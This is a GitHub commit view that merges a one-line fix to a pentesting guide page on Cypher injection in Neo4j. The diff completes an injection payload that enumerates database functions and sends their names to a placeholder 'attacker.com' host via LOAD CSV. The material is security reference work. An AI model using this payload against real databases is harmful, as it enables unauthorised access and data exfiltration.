Merge pull request #632 from TomF0x/patch-1

Update cypher-injection-neo4j.md
This commit is contained in:
Carlos Polop 2023-05-26 11:29:11 +02:00 committed by GitHub
commit b2fcc5d7a1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -151,7 +151,7 @@ Using the built-in procedures **`dbms.functions()`** and **`dbms.procedures()`**
{% code overflow="wrap" %}
```sql
' OR 1=1 WITH 1 as _l00 CALL dbms.functions() yield name LOAD CSV FROM
' OR 1=1 WITH 1 as _l00 CALL dbms.functions() yield name LOAD CSV FROM 'https://attacker.com/' + name as _l RETURN 1 //
```
{% endcode %}